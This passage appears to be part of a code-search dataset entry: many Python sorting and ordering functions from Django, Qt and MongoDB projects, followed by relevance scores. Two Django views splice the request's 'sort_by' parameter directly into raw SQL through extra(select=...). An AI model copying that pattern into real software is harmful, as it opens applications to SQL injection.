\"DESC\":\n objects = objects.reverse()\n elif col_nm =='administrator__first_name':\n objects=Organization.objects.filter().order_by(col_nm)\n if sort_order == \"DESC\":\n objects = objects.reverse()\n else:\n objects=Organization.objects.extra(select=\n {'name':'lower(name)'}).order_by('name')\n\n\n return objects", "def get_queryset(self, request):\n queryset = self.model._default_manager.all()\n queryset = queryset.filter(user=request.user)\n ordering = self.get_ordering()\n if ordering:\n if isinstance(ordering, str):\n ordering = (ordering,)\n queryset = queryset.order_by(*ordering)\n return queryset", "def test_relatedfieldlistfilter_foreignkey_default_ordering(self):\n\n class BookAdmin(ModelAdmin):\n list_filter = (\"employee\",)\n\n self.addCleanup(setattr, Employee._meta, \"ordering\", Employee._meta.ordering)\n Employee._meta.ordering = (\"name\",)\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(self.jack.pk, \"Jack Red\"), (self.john.pk, \"John Blue\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def test_entities__Entity__setFieldOrder__2(entity_with_field):\n entity = entity_with_field\n entity.setFieldOrder(['dummy2', 'I-do-not-exist', 'dummy'])\n assert ['dummy2', 'dummy'] == entity.getFieldOrder()\n # Unknown field names are not written into storage:\n order_storage = zope.component.getUtility(IOrderStorage)\n assert (['dummy2', 'dummy'] ==\n order_storage.byNamespace(entity.order_storage_namespace))", "def test_entities__Entity__setFieldOrder__1(entity_with_field, field):\n assert [] == entity_with_field.getFieldOrder()\n entity_with_field.setFieldOrder(['dummy2', field.__name__, 'dummy'])\n assert (['dummy2', field.__name__, 'dummy'] ==\n entity_with_field.getFieldOrder())", "def test_relatedonlyfieldlistfilter_foreignkey_default_ordering(self):\n\n class BookAdmin(ModelAdmin):\n list_filter = ((\"employee\", RelatedOnlyFieldListFilter),)\n\n albert = Employee.objects.create(name=\"Albert Green\", department=self.dev)\n self.djangonaut_book.employee = albert\n self.djangonaut_book.save()\n self.bio_book.employee = self.jack\n self.bio_book.save()\n\n self.addCleanup(setattr, Employee._meta, \"ordering\", Employee._meta.ordering)\n Employee._meta.ordering = (\"name\",)\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(albert.pk, \"Albert Green\"), (self.jack.pk, \"Jack Red\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def _get_order_by(order, orderby, order_by_fields):\n try:\n # Find the actual database fieldnames for the keyword.\n db_fieldnames = order_by_fields[orderby]\n except KeyError:\n raise ValueError(\n \"Invalid value for 'orderby': '{}', supported values are: {}\".format(\n orderby, \", \".join(sorted(order_by_fields.keys()))\n )\n )\n\n # Default to descending for some fields, otherwise be ascending\n is_desc = (not order and orderby in ORDER_BY_DESC) or (order or \"asc\").lower() in (\n \"desc\",\n \"descending\",\n )\n\n if is_desc:\n return map(lambda name: \"-\" + name, db_fieldnames)\n else:\n return db_fieldnames", "def set_sorting_enabled(self, value):\n self.tableWidget.setSortingEnabled(value)", "def get_ordering(self, request, queryset, view):\n ordering = []\n params = get_datatables_ordering(request.query_params)\n if params:\n fields = [param.strip() for param in params.split(',')]\n ordering = self.remove_invalid_fields(queryset, fields, view, request)\n if ordering:\n return ordering\n\n # No ordering was included, or all the ordering fields were invalid\n return self.get_default_ordering(view)", "def sort(self, column, order=Qt.AscendingOrder):\n if(column == Columns.Date):\n self.sorting = Sorting.Date\n elif(column == Columns.Code):\n self.sorting = Sorting.Code\n elif(column == Columns.User):\n self.sorting = Sorting.User\n elif(column == Columns.Tags):\n self.sorting = Sorting.Priviledges\n elif(column == Columns.TimesRequested):\n self.sorting = Sorting.TimesRequested\n\n if(order == Qt.DescendingOrder):\n self.sorting |= Sorting.Reversed\n\n self._reset_view()", "def _apply_order_by_and_limit(objects, order_by=None, limit=None):\n if order_by:\n try:\n # Note: currently we sort only by the first column from the list\n order_by = order_by[0]\n order_field = order_by[\"name\"]\n order_desc = order_by.get(\"desc\", False)\n objects = sorted(\n objects,\n key=lambda obj: getattr(obj, order_field),\n reverse=order_desc,\n )\n except:\n raise BadQueryException(\"Bad query: Invalid 'order_by' parameter\")\n\n if limit:\n try:\n from_, to_ = limit\n objects = objects[from_: to_]\n except:\n raise BadQueryException(\"Bad query: Invalid 'limit' parameter.\")\n\n return objects", "def test_entities__Entity__getFieldOrder__2(entity_with_field, field):\n entity = entity_with_field\n entity.setFieldOrder([field.__name__, 'dummy'])\n assert [field.__name__, 'dummy'] == entity.getFieldOrder()", "def test_order_by(self):\n self.Person(name=\"User B\", age=40).save()\n self.Person(name=\"User A\", age=20).save()\n self.Person(name=\"User C\", age=30).save()\n\n names = [p.name for p in self.Person.objects.order_by(\"-age\")]\n assert names == [\"User B\", \"User C\", \"User A\"]\n\n names = [p.name for p in self.Person.objects.order_by(\"+age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n names = [p.name for p in self.Person.objects.order_by(\"age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n ages = [p.age for p in self.Person.objects.order_by(\"-name\")]\n assert ages == [30, 40, 20]\n\n ages = [p.age for p in self.Person.objects.order_by()]\n assert ages == [40, 20, 30]\n\n ages = [p.age for p in self.Person.objects.order_by(\"\")]\n assert ages == [40, 20, 30]", "def queryset(self, ordering=None):\r\n qs = self.model._default_manager.get_query_set()\r\n if not ordering:\r\n ordering = self.ordering or () # otherwise we might try to *None, which is bad ;)\r\n if ordering:\r\n qs = qs.order_by(*ordering)\r\n return qs", "def sort(self, *order_fields):\n return MockSearch(\n self, self._query, self.nested_filter_calls, order_fields,\n self._script_fields\n )", "def order_by(self, aliases):\r\n accessors = []\r\n for alias in aliases:\r\n bound_column = self.table.columns[OrderBy(alias).bare]\r\n # bound_column.order_by reflects the current ordering applied to\r\n # the table. As such we need to check the current ordering on the\r\n # column and use the opposite if it doesn't match the alias prefix.\r\n if alias[0] != bound_column.order_by_alias[0]:\r\n accessors += bound_column.order_by.opposite\r\n else:\r\n accessors += bound_column.order_by\r\n if hasattr(self, \"queryset\"):\r\n translate = lambda accessor: accessor.replace(Accessor.SEPARATOR, QUERYSET_ACCESSOR_SEPARATOR)\r\n self.queryset = self.queryset.order_by(*(translate(a) for a in accessors))\r\n else:\r\n self.list.sort(key=OrderByTuple(accessors).key)", "def get_queryset(self):\n\n search_str = self.request.GET.get('search', None)\n col_nm = self.request.GET.get('sort_by', \"name\")\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', \"ASC\")\n self.sort_ordr=sort_order\n if search_str:\n a = Q(name__icontains = search_str)\n b = Q(description__icontains = search_str)\n objects = self.model.objects.filter(a | b).distinct()\n\n else:\n objects = OrganizationType.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n return objects", "def sortby(self):\n return self._sortby", "def order_query(self, query):\n\n direction = desc if self.direction == 'desc' else asc\n if self.order in inspect(self.model_class).columns.keys():\n attribute = getattr(self.model_class, self.order)\n elif self.order == 'group.name':\n attribute = func.coalesce(UserGroup.name, '')\n elif self.order == 'user.realname':\n attribute = func.coalesce(User.realname, '')\n elif self.order == 'user.username':\n attribute = func.coalesce(User.username, '')\n elif self.order == 'user.name':\n attribute = func.coalesce(User.realname, User.username, '')\n else:\n attribute = self.model_class.first_issue\n\n return query.order_by(None).order_by(direction(attribute))", "def sort_from_request(request):\n order = request.args.get('order_by')\n if order:\n key, direction = order.split(',')\n reverse = False if direction == 'ASC' else True\n return Sort(key, reverse)\n else:\n return Sort(None)", "def _sort_by_query_string_param(self, songs):\n orderable_fields_dict = {\n 'name': Lower('name'),\n 'artist': Lower('artist__name'),\n 'avgRating': 'average_rating',\n 'year': 'year'\n }\n\n order_by = self.request.query_params.get('orderBy', None)\n\n if order_by is not None and order_by in orderable_fields_dict:\n order_field = orderable_fields_dict[order_by]\n\n # sort in direction indicated by `direction` query string param\n # or ascending, by default\n direction = self.request.query_params.get('direction', 'asc')\n if direction == 'desc':\n if order_by == 'name' or order_by == 'artist':\n order_field = order_field.desc()\n else:\n order_field = '-' + order_field\n\n # add annotation for average_rating to sort by computed property\n if order_by == 'avgRating':\n songs = songs.annotate(\n average_rating=Avg('ratings__rating')\n )\n\n songs = songs.order_by(order_field)\n\n return songs", "def validate_sort_order(filter, main_field):\n\n # The tiebreaker fields are always in the same order, but\n # if the main sort field is one of the tiebreaker fields,\n # it's removed from the list -- there's no need to sort on\n # that field a second time.\n default_sort_fields = [\n {x: \"asc\"} for x in ['sort_author', 'sort_title', 'work_id']\n if x != main_field\n ]\n assert default_sort_fields == filter.sort_order[1:]\n return filter.sort_order[0]", "def test_relatedfieldlistfilter_foreignkey_ordering(self):\n\n class EmployeeAdminWithOrdering(ModelAdmin):\n ordering = (\"name\",)\n\n class BookAdmin(ModelAdmin):\n list_filter = (\"employee\",)\n\n site.register(Employee, EmployeeAdminWithOrdering)\n self.addCleanup(lambda: site.unregister(Employee))\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(self.jack.pk, \"Jack Red\"), (self.john.pk, \"John Blue\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def _orderby_expression(self):\n return ''", "def order_by(cls, *args):\n return cls.query.order_by(*args)", "def order_by(self, column, direction=\"ASC\"):\n self._order_by += ((column, direction),)\n return self", "def add_sort(self, field_name, ascending=True):\n if not self._query_is_empty():\n self.query.AND()\n if ascending:\n logger.info(\"Sorting records by {} in ascending order.\".format(field_name))\n self.query.field(field_name.lower()).order_ascending() # lowercase for convenience\n logger.debug(\"sysparm_query contains: {q}\".format(q=self.query._query))\n else:\n logger.info(\"Sorting records by {} in descending order.\".format(field_name))\n self.query.field(field_name.lower()).order_descending()\n logger.debug(\"sysparm_query contains: {q}\".format(q=self.query._query))", "def test_relatedonlyfieldlistfilter_foreignkey_ordering(self):\n\n class EmployeeAdminWithOrdering(ModelAdmin):\n ordering = (\"name\",)\n\n class BookAdmin(ModelAdmin):\n list_filter = ((\"employee\", RelatedOnlyFieldListFilter),)\n\n albert = Employee.objects.create(name=\"Albert Green\", department=self.dev)\n self.djangonaut_book.employee = albert\n self.djangonaut_book.save()\n self.bio_book.employee = self.jack\n self.bio_book.save()\n\n site.register(Employee, EmployeeAdminWithOrdering)\n self.addCleanup(lambda: site.unregister(Employee))\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(albert.pk, \"Albert Green\"), (self.jack.pk, \"Jack Red\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def get_query_set(model_class, sort_column=\"id\", sort_descending=True, filters={}): \n sort_modifier = \"\"\n if sort_descending:\n sort_modifier = \"-\"\n return model_class.objects.filter(**filters).order_by(\"%s%s\"% (sort_modifier, sort_column))", "def on_combo_sort_col_names_currentIndexChanged(self, index):\n if self.ui.sort_radio_asc.isChecked():\n self.model.setSort(index, Qt.AscendingOrder)\n else:\n self.model.setSort(index, Qt.DescendingOrder)\n self.model.select()", "def order_by_alias(self):\r\n order_by = OrderBy((self.table.order_by or {}).get(self.name, self.name))\r\n order_by.next = order_by.opposite if self.is_ordered else order_by\r\n return order_by", "def update_order_property_setter(self, has_custom, fieldname):\n\t\tproperty_name = f\"{fieldname}_order\"\n\t\tif has_custom:\n\t\t\t# save the order of the actions and links\n\t\t\tself.make_property_setter(\n\t\t\t\tproperty_name, json.dumps([d.name for d in self.get(fieldname)]), \"Small Text\"\n\t\t\t)\n\t\telse:\n\t\t\tfrappe.db.delete(\"Property Setter\", dict(property=property_name, doc_type=self.doc_type))", "def set_sort_order(self, sort_order):\n\n\t\tif sort_order is not None and not isinstance(sort_order, str):\n\t\t\traise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: sort_order EXPECTED TYPE: str', None, None)\n\t\t\n\t\tself.__sort_order = sort_order\n\t\tself.__key_modified['sort_order'] = 1", "def changeOrder(self):\n order = self.orderSpinBox.value()\n nfilter = int(str(self.filterComboBox.currentText()))\n if order > nfilter - 2:\n order = nfilter - 2\n if order < 1:\n order = 1\n self.orderSpinBox.setValue(order)\n self.order = order", "def order_by(self, *colnames):\r\n if len(colnames) == 0:\r\n clone = copy.deepcopy(self)\r\n clone._order = []\r\n return clone\r\n\r\n conditions = []\r\n for colname in colnames:\r\n conditions.append('\"{}\" {}'.format(*self._get_ordering_condition(colname)))\r\n\r\n clone = copy.deepcopy(self)\r\n clone._order.extend(conditions)\r\n return clone", "def resolve_orderby(self, orderby: Optional[Union[List[str], str]]) -> List[OrderBy]:\n validated: List[OrderBy] = []\n\n if orderby is None:\n return validated\n\n if isinstance(orderby, str):\n if not orderby:\n return validated\n\n orderby = [orderby]\n\n orderby_columns: List[str] = orderby if orderby else []\n\n resolved_orderby: Union[str, SelectType, None]\n for orderby in orderby_columns:\n bare_orderby = orderby.lstrip(\"-\")\n bare_orderby = self.tag_to_prefixed_map.get(bare_orderby, bare_orderby)\n try:\n # Allow ordering equations with the calculated alias (ie. equation[0])\n if is_equation_alias(bare_orderby):\n resolved_orderby = bare_orderby\n # Allow ordering equations directly with the raw alias (ie. equation|a + b)\n elif is_equation(bare_orderby):\n resolved_orderby = self.equation_alias_map[strip_equation(bare_orderby)]\n bare_orderby = resolved_orderby.alias\n else:\n resolved_orderby = self.resolve_column(bare_orderby)\n except (NotImplementedError, IncompatibleMetricsQuery):\n resolved_orderby = None\n\n direction = Direction.DESC if orderby.startswith(\"-\") else Direction.ASC\n\n if fields.is_function(bare_orderby) and (\n isinstance(resolved_orderby, Function)\n or isinstance(resolved_orderby, CurriedFunction)\n or isinstance(resolved_orderby, AliasedExpression)\n ):\n bare_orderby = resolved_orderby.alias\n\n for selected_column in self.columns:\n if isinstance(selected_column, Column) and selected_column == resolved_orderby:\n validated.append(OrderBy(selected_column, direction))\n break\n elif (\n isinstance(selected_column, AliasedExpression)\n and selected_column.alias == bare_orderby\n ):\n if bare_orderby in self.orderby_converter:\n validated.append(self.orderby_converter[bare_orderby](direction))\n break\n # We cannot directly order by an `AliasedExpression`.\n # Instead, we order by the column inside.\n validated.append(OrderBy(selected_column.exp, direction))\n break\n\n elif (\n isinstance(selected_column, CurriedFunction)\n and selected_column.alias == bare_orderby\n ):\n if bare_orderby in self.orderby_converter:\n validated.append(self.orderby_converter[bare_orderby](direction))\n validated.append(OrderBy(selected_column, direction))\n break\n\n if len(validated) == len(orderby_columns):\n return validated\n\n # TODO: This is no longer true, can order by fields that aren't selected, keeping\n # for now so we're consistent with the existing functionality\n raise InvalidSearchQuery(\"Cannot sort by a field that is not selected.\")", "def get_paginate_by(self, queryset):\n return self.request.GET.get('paginate_by', self.paginate_by)", "def get_queryset(self):\n search_str = self.request.GET.get('search', None)\n col_nm = self.request.GET.get('sort_by', 'title')\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', 'ASC')\n self.sort_ordr=sort_order\n if search_str:\n search_str = self.request.GET.get('search', None)\n a = Q(title__icontains = search_str)\n b = Q(description__icontains = search_str)\n objects = Designation.objects.filter(a | b).distinct()\n else: # SORTING BY COL_NM\n objects = Designation.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n return objects", "def get_default_paginate_by(self, queryset):\n return self.paginate_by", "def __init__(\n self,\n queryset,\n per_page=25,\n ordering=\"pk\",\n allow_count=False,\n allow_empty_first_page=True,\n orphans=0,\n ):\n self.queryset = queryset\n self.per_page = int(per_page)\n self.ordering = ordering\n self.allow_count = allow_count\n\n field = ordering.replace(\"-\", \"\")\n self._reverse_ordering = field if ordering[0] == \"-\" else \"-{0}\".format(ordering)\n self._field = field", "def get_queryset(self):\n queryset = super(viewsets.ModelViewSet, self).get_queryset().order_by('first_name')\n\n if self.request.GET.get('q', None):\n return queryset.filter(username__icontains=self.request.GET['q'])\n return queryset", "def sort_field():\n _id = request.form['_id']\n old_index = request.form['old_index']\n new_index = request.form['new_index']\n data, code, message = FIELD_SERVICE.sort_field(_id, old_index, new_index)\n return __result(data, code, message)", "def sort(self, field='word', order=None):\n self.data = list(self.sorted(field, order))", "def order_by(self, *orderings):\n return OrderedQuery(self, orderings)", "def ordered(self):\n if isinstance(self, EmptyQuerySet):\n return True\n if self.query.extra_order_by or self.query.order_by:\n return True\n elif (\n self.query.default_ordering\n and self.query.get_meta().ordering\n and\n # A default ordering doesn't affect GROUP BY queries.\n not self.query.group_by\n ):\n return True\n else:\n return False", "def order_by(self, *fields):\n doc = []\n for field in fields:\n if field.startswith('-'):\n doc.append((field.strip('-'), pymongo.DESCENDING))\n else:\n doc.append((field, pymongo.ASCENDING))\n return self.sort(doc)", "def pre_filter(self, qs):\n return qs", "def test_shelflistitem_view_orderby(order_by, api_settings, shelflist_solr_env,\n get_shelflist_urls, api_client):\n sl_urls = get_shelflist_urls(shelflist_solr_env.records['shelflistitem'])\n test_url = '{}?orderBy={}'.format(sl_urls.values()[0], order_by)\n response = api_client.get(test_url)\n assert response.status_code == 400\n assert 'not a valid field for ordering' in response.data['detail']", "def sort_on(self):\n if \"sortOn\" in self._prop_dict:\n return self._prop_dict[\"sortOn\"]\n else:\n return None", "def list(self, request, *args, **kwargs):\n self.order_queryset = True\n if 'ordering' in request.query_params.keys():\n self.order_queryset = False\n return super(ReleaseViewSet, self).list(request, *args, **kwargs)", "def setSearchFieldnames(self, fieldnames):\n self._search_fieldnames = fieldnames", "def sort_order(self, sort_order):\n\n self._sort_order = sort_order", "def queryset(self, request):\n qs = self.model.all_objects.get_query_set()\n ordering = self.ordering or ()\n if ordering:\n qs = qs.order_by(*ordering)\n return qs", "def setFieldNames(self, model, lyr): \n #get the fields\n fields = lyr.pendingFields()\n position = 0\n \n #set column names\n for field in fields:\n model.setHorizontalHeaderItem(position, QStandardItem(field.name()))\n position+=1", "def get_queryset(self, request):\n querys = self.model.all_objects.get_queryset()\n ordering = self.get_ordering(request)\n if ordering:\n querys = querys.order_by(*ordering)\n return querys", "def default_sort_column(self, default_sort_column):\n\n self._default_sort_column = default_sort_column", "def get_sort_query(self, kind, order, is_number):\n pass", "def testSortNoDbAscending(self):\n self.request.GET['sort'] = \"custom\"\n self.datagrid.load_state()\n self.assertEqual(self.datagrid.sort_list, [\"custom\"])\n self.assertEqual(len(self.datagrid.rows), self.datagrid.paginate_by)\n self.assertEqual(self.datagrid.rows[0]['object'].name, \"Group 04\")\n self.assertEqual(self.datagrid.rows[1]['object'].name, \"Group 08\")\n self.assertEqual(self.datagrid.rows[2]['object'].name, \"Group 12\")\n\n # Exercise the code paths when rendering\n self.datagrid.render_listview()", "def order_by_as_sql(self):\n return comma_join([\n '%s DESC' % field[1:] if isinstance(field, str) and field[0] == '-' else str(field)\n for field in self._order_by\n ])", "def order_by(self, list_or_name):\n if not isinstance(list_or_name, basestring):\n for c in list_or_name:\n self.order_by(c)\n else:\n self._orderby_conds.append(list_or_name)\n\n return self" ]
[ "0.7341898", "0.6805477", "0.6581681", "0.6385461", "0.6315338", "0.6252756", "0.6159823", "0.6090766", "0.5956584", "0.5951964", "0.59386057", "0.59089255", "0.5759275", "0.57582235", "0.5749629", "0.57229424", "0.5717913", "0.5713295", "0.5711421", "0.5647316", "0.56422055", "0.5628972", "0.5614769", "0.5580601", "0.55733776", "0.55547047", "0.553233", "0.5531154", "0.55197537", "0.5511838", "0.54860467", "0.546445", "0.542131", "0.5418024", "0.54073393", "0.5401253", "0.5371489", "0.53640515", "0.5361596", "0.53579396", "0.5351", "0.5332443", "0.53310454", "0.53293097", "0.5325503", "0.53149694", "0.53113145", "0.53030163", "0.5302289", "0.5290726", "0.5260061", "0.52572787", "0.52543426", "0.5249301", "0.5222232", "0.5200427", "0.5191958", "0.51868385", "0.51580137", "0.51320595", "0.513167", "0.5104893", "0.50984687", "0.5095851", "0.50854176", "0.5078093", "0.50720453", "0.507147", "0.5069176", "0.5066822", "0.5014096", "0.50123554", "0.50003916", "0.49757993", "0.49698162", "0.4958311", "0.4955699", "0.49396747", "0.49281523", "0.49274027", "0.49263138", "0.4920943", "0.49131167", "0.48960656", "0.48881856", "0.4877852", "0.48678052", "0.48620927", "0.4860523", "0.48460498", "0.48270464", "0.48247853", "0.48241735", "0.48169374", "0.48094258", "0.47954646", "0.47767633", "0.47754154", "0.4773829", "0.47728968" ]
0.7116057
1
Set the `order_by_field` on the filterset and ensure that the field name is respected.
def test_ordering_with_overridden_field_name_and_descending(self): class F(FilterSet): class Meta: model = User fields = ['username', 'status'] order_by = ['status', '-status'] order_by_field = 'order' f = F().form self.assertNotIn('o', f.fields) self.assertIn('order', f.fields) self.assertEqual(f.fields['order'].choices, [('status', 'Status'), ('-status', 'Status (descending)')])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_ordering_with_overridden_field_name(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = ['status']\n order_by_field = 'order'\n\n f = F({'order': 'status'}, queryset=self.qs)\n self.assertQuerysetEqual(\n f.qs, ['carl', 'alex', 'jacob', 'aaron'], lambda o: o.username)", "def test_ordering_with_overridden_field_name(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = ['status']\n order_by_field = 'order'\n\n f = F().form\n self.assertNotIn('o', f.fields)\n self.assertIn('order', f.fields)\n self.assertEqual(f.fields['order'].choices, [('status', 'Status')])", "def order_by(self, order_by):\n\n self._order_by = order_by", "def set_sort_by(self, sort_by):\n\n\t\tif sort_by is not None and not isinstance(sort_by, str):\n\t\t\traise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: sort_by EXPECTED TYPE: str', None, None)\n\t\t\n\t\tself.__sort_by = sort_by\n\t\tself.__key_modified['sort_by'] = 1", "def user_order_by(self, field):\n # Get ordering model.\n model_label = order.utils.resolve_labels('.'.join(\\\n [self.model._meta.app_label, self.model._meta.object_name]))\n orderitem_set = getattr(self.model, \\\n order.utils.resolve_order_item_related_set_name(model_label))\n order_model = orderitem_set.related.model\n\n # Resolve ordering model table name.\n db_table = order_model._meta.db_table\n\n # Add ordering field as extra queryset fields.\n pk_name = self.model._meta.pk.attname\n\n # If we have a descending query remove '-' from field name when quering.\n sanitized_field = field.lstrip('-')\n\n extra_select = {\n sanitized_field: '(SELECT %s from %s WHERE item_id=%s.%s)' % \\\n (sanitized_field, db_table, self.model._meta.db_table, pk_name)\n }\n\n # Use original field name when ordering to allow for descending.\n return self.extra(select=extra_select).all().order_by(field)", "def order_queryset(self, queryset):\n if ordering := self.request.query_params.get(\"ordering\"):\n order_by = []\n regex = re.compile(r\"-?annotations__(?P<field_id>\\d+)\")\n fields = [field.strip() for field in ordering.split(\",\")]\n for match in filter(None, map(regex.match, fields)):\n field_id = match.group(\"field_id\")\n annotation_value = AnnotationValue.objects.filter(\n entity_id=OuterRef(\"pk\"), field_id=field_id\n ).values(\"_value__value\")\n annotate = {f\"_order_{field_id}\": Subquery(annotation_value)}\n queryset = queryset.annotate(**annotate)\n sign = \"-\" if match.string.startswith(\"-\") else \"\"\n order_by.append(f\"{sign}_order_{field_id}\")\n if order_by:\n queryset = queryset.order_by(*order_by)\n return queryset", "def order_by(self, *field_names):\n qs = copy(self)\n qs._order_by = field_names\n return qs", "def order_by(self, field_paths, order=None):\n raise NotImplementedError(\"This should have been implemented.\")", "def order_by(self, *fields):\n self.query = self.query.sort(self._parse_order_spec(fields))\n return self", "def sortby(self, sortby):\n self._sortby = sortby", "def sort_queryset(\n queryset: QuerySet, sort_by: SortInputObjectType, reversed: bool\n) -> QuerySet:\n sorting_direction = sort_by.direction\n if reversed:\n sorting_direction = REVERSED_DIRECTION[sorting_direction]\n\n sorting_field = sort_by.field\n sorting_attribute = getattr(sort_by, \"attribute_id\", None)\n\n if sorting_field is not None and sorting_attribute is not None:\n raise GraphQLError(\n \"You must provide either `field` or `attributeId` to sort the products.\"\n )\n elif sorting_attribute is not None: # empty string as sorting_attribute is valid\n return _sort_queryset_by_attribute(\n queryset, sorting_attribute, sorting_direction\n )\n\n sort_enum = sort_by._meta.sort_enum\n sorting_fields = sort_enum.get(sorting_field)\n sorting_field_name = sorting_fields.name.lower()\n\n custom_sort_by = getattr(sort_enum, f\"qs_with_{sorting_field_name}\", None)\n if custom_sort_by:\n queryset = custom_sort_by(queryset)\n\n sorting_field_value = sorting_fields.value\n sorting_list = [f\"{sorting_direction}{field}\" for field in sorting_field_value]\n\n return queryset.order_by(*sorting_list)", "def get_queryset(self):\n qs = super(SortForm, self).get_queryset()\n\n qs = self.pre_sort(qs)\n\n # Ensure that the form is valid\n if not self.is_valid():\n return qs\n\n # Do Sorting\n sorts = self.cleaned_data.get('sort', [])\n order_by = []\n for sort in sorts:\n param = self.HEADERS[abs(sort) - 1]['column']\n if sort < 0:\n param = '-' + param\n order_by.append(param)\n\n if order_by:\n qs = qs.order_by(*order_by)\n\n qs = self.post_sort(qs)\n\n return qs", "def order_by(self, *field_names):\n assert self.query.can_filter(), \\\n \"Cannot reorder a query once a slice has been taken.\"\n\n clone = self._clone()\n for field_name in field_names:\n clone.query.order_by.append(field_name)\n return clone", "def test_ordering_descending_unset(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = True\n\n f = F({'o': '-username'}, queryset=self.qs)\n self.assertQuerysetEqual(\n f.qs, ['jacob', 'carl', 'alex', 'aaron'], lambda o: o.username)", "def order_by(self, value):\r\n # collapse empty values to ()\r\n order_by = () if not value else value\r\n # accept string\r\n order_by = order_by.split(',') if isinstance(order_by, six.string_types) else order_by\r\n valid = []\r\n # everything's been converted to a iterable, accept iterable!\r\n for alias in order_by:\r\n name = OrderBy(alias).bare\r\n if name in self.columns and self.columns[name].orderable:\r\n valid.append(alias)\r\n self._order_by = OrderByTuple(valid)\r\n self.data.order_by(self._order_by)", "def filter_and_order(cls, *args, **kwargs):\n return cls.query.filter_by(**kwargs).order_by(*args)", "def clean_order_by(self):\n\t\tresult = None\n\t\tmap_id = self.cleaned_data.get('order_by', '')\n\t\tif self._ORDER_BY_MAP.has_key(map_id):\n\t\t\tresult = self._ORDER_BY_MAP.get(map_id)\n\t\telse:\n\t\t\tresult = self._ORDER_BY_MAP.values()[0]\n\t\treturn result", "def sort_by(self, sort_direction: epl_imagery_pb2.SortDirection):\n # TODO if you want to sort by multiple parameters, then this class will have to have a pointer to the filter\n if self.metadata_filters.sorted_by:\n self.metadata_filters.sorted_by.query_params.sort_direction = epl_imagery_pb2.NOT_SORTED\n\n self.metadata_filters.sorted_by = self\n\n # class that contains it, and upon updating this class there is a call back to the container class to insert\n # this parameter in a list\n self.query_params.sort_direction = sort_direction\n self.b_initialized = True", "def order_by(self, *fields):\n self._evaluated = False\n if self._order is None:\n self._order = []\n\n for field in fields:\n direction = \"asc\"\n if field.startswith('-'):\n direction = \"desc\"\n field = field[1:]\n\n self._order.append({ field : direction })\n\n return self", "def orderby(cls, field, desc=False):\n cls.runtime.set_orderby((field, desc))\n return cls", "def order_by(self, field_name, direction=ASCENDING):\n\n from jetengine.fields.base_field import BaseField\n from jetengine.fields.list_field import ListField\n\n if isinstance(field_name, (ListField,)):\n raise ValueError(\n \"Can't order by a list field. If you meant to order by the size of the list, please use either an Aggregation Pipeline query (look for Document.objects.aggregate) or create an IntField with the size of the list field in your Document.\"\n )\n\n if isinstance(field_name, (BaseField,)):\n field_name = field_name.name\n\n if field_name not in self.__klass__._fields:\n raise ValueError(\n \"Invalid order by field '%s': Field not found in '%s'.\" % (field_name, self.__klass__.__name__)\n )\n\n field = self.__klass__._fields[field_name]\n self._order_fields.append((field.db_field, direction))\n return self", "def pre_sort(self, qs):\n return qs", "def ordering(self, qs):\n request = self.request\n # Number of columns that are used in sorting\n try:\n i_sorting_cols = int(request.REQUEST.get('iSortingCols', 0))\n except ValueError:\n i_sorting_cols = 0\n\n order = []\n order_columns = self.get_order_columns()\n for i in range(i_sorting_cols):\n # sorting column\n try:\n i_sort_col = int(request.REQUEST.get('iSortCol_%s' % i))\n except ValueError:\n i_sort_col = 0\n # sorting order\n s_sort_dir = request.REQUEST.get('sSortDir_%s' % i)\n\n sdir = '-' if s_sort_dir == 'desc' else ''\n\n sortcol = order_columns[i_sort_col]\n if isinstance(sortcol, list):\n for sc in sortcol:\n order.append('%s%s' % (sdir, sc))\n else:\n order.append('%s%s' % (sdir, sortcol))\n if order:\n return qs.order_by(*order)\n return qs", "def ordering(self):\r\n if hasattr(self, \"queryset\"):\r\n aliases = {}\r\n for bound_column in self.table.columns:\r\n aliases[bound_column.order_by_alias] = bound_column.order_by\r\n try:\r\n return next(segment(self.queryset.query.order_by, aliases))\r\n except StopIteration:\r\n pass", "def order_by(self, field, descending=False):\n self._order_by.append((field, descending))\n return self", "def orderby():\n pass", "def order_by(self, *field_names):\n if self.query.is_sliced:\n raise TypeError(\"Cannot reorder a query once a slice has been taken.\")\n obj = self._chain()\n obj.query.clear_ordering(force=True, clear_default=False)\n obj.query.add_ordering(*field_names)\n return obj", "def get_sort_field(self, kind, order, is_number):\n pass", "def order(self, field, direction=Order.ASC):\n if field == 'id':\n field = '_id'\n\n self._order_by.append((field, direction))\n\n return self", "def sortby(self):\n ...", "def get_sort_by(self):\n\n\t\treturn self.__sort_by", "def get_queryset(self):\n rs = super(BaseQuerysetMixin, 